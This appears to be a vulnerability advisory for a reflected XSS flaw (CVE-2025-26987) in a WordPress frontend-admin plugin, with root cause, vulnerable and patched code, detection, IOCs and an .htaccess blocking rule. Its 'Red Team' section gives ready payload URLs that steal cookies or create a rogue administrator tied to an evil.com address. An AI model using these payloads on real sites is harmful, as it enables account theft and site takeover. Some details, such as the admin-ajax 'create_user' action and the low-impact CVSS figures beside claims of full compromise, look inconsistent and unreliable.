CVE-2025-26987
Executive Summary
CVE-2025-26987 is a reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin "Frontend Admin by DynamiApps" (acf-frontend-form-element). The vulnerability exists in versions up to and including 3.25.17. An attacker can craft a malicious URL that, when visited by an authenticated administrator, executes arbitrary JavaScript in the context of the WordPress admin dashboard. This can lead to session hijacking, privilege escalation, or defacement. The CVSS score is 7.1 (High), and no official patch has been released as of this report.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository and potentially third-party marketplaces. Users are advised to monitor the plugin's update channel for a patched version. Since the plugin is not an NPM, PyPI, Go, or Ruby package, supply chain risks are limited to the WordPress ecosystem. However, compromised plugin updates could introduce backdoors; verify checksums and signatures if available.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed to trigger the XSS.
- User Interaction (UI): Required (R) – Victim must click a crafted link.
- Scope (S): Changed (C) – The XSS can impact resources beyond the vulnerable component (e.g., admin session).
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify data.
- Availability (A): Low (L) – Limited impact on availability.
Threat Level: High. The vulnerability is easy to exploit and can lead to full WordPress admin compromise if an admin user is targeted.
Deep Dive & Mechanics
The vulnerability resides in the acf-frontend-form-element plugin's handling of user-supplied input in the $_GET or $_POST parameters. The plugin fails to properly sanitize and escape output when rendering error messages or form feedback. An attacker can inject malicious JavaScript into a parameter (e.g., ?message=<script>alert(1)</script>), which is then reflected back to the user without proper encoding.
Root Cause: The plugin uses echo $_GET['message'] or similar without applying esc_html() or wp_kses().
Attack Flow:
- Attacker crafts a URL:
https://victim.com/wp-admin/admin.php?page=frontend-admin&message=<script>alert(document.cookie)</script> - Attacker sends the link to an authenticated admin (e.g., via email or social engineering).
- Admin clicks the link, and the script executes in the admin's browser.
- The script can steal cookies, create new admin users, or install malicious plugins.
Vulnerable vs. Patched Code
Vulnerable Code (acf-frontend-form-element <= 3.25.17):
// In some template or handler file
$message = $_GET['message'];
echo '<div class="notice">' . $message . '</div>';
Patched Code (Hypothetical):
$message = isset($_GET['message']) ? sanitize_text_field($_GET['message']) : '';
echo '<div class="notice">' . esc_html($message) . '</div>';
The patched version uses sanitize_text_field() to strip malicious input and esc_html() to encode HTML entities, preventing script execution.
Exploitation & Lab Setup
Red Team
Prerequisites:
- A WordPress installation with the vulnerable plugin (<= 3.25.17).
- A valid admin session (for full impact).
Exploit Payload:
<script>fetch('/wp-admin/admin-ajax.php?action=create_user&username=hacker&email=hacker@evil.com&role=administrator');</script>
Crafted URL:
https://victim.com/wp-admin/admin.php?page=frontend-admin&message=<script>fetch('/wp-admin/admin-ajax.php?action=create_user&username=hacker&email=hacker@evil.com&role=administrator');</script>
Steps:
- Host a simple HTML page that redirects to the crafted URL, or send the link directly.
- When the admin clicks, the script executes and creates a new admin user.
- Log in as the new admin user to take over the site.
Blue Team
Detection:
- Monitor web server logs for requests containing
<script>tags in themessageparameter. - Use WAF rules to block reflected XSS patterns.
Honeypot:
- Deploy a fake admin page that logs all
messageparameter values and alerts on script tags.
Lab Setup:
# Install WordPress and plugin
docker run -d --name wp -p 8080:80 wordpress:latest
docker exec wp wp plugin install acf-frontend-form-element --version=3.25.17
Indicators of Compromise (IOCs)
- Network:
- HTTP requests to
/wp-admin/admin.php?page=frontend-admin&message=<script>... - Outbound connections to attacker-controlled domains from admin browsers.
- HTTP requests to
- Host:
- Unexpected admin users created.
- Modified plugin files (e.g.,
wp-content/plugins/acf-frontend-form-element/).
- Logs:
- Web server logs with
messageparameter containing<script>oronerror=.
- Web server logs with

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patch is released.
- Implement a Web Application Firewall (WAF) rule to block reflected XSS patterns.
- Educate administrators not to click suspicious links.
Long-term Fix:
- Apply the vendor's patch when available.
- Replace the plugin with an alternative that is actively maintained.
Workaround:
- Add the following to
.htaccess(Apache) or equivalent:
RewriteCond %{QUERY_STRING} (message=.*<script) [NC]
RewriteRule .* - [F,L]
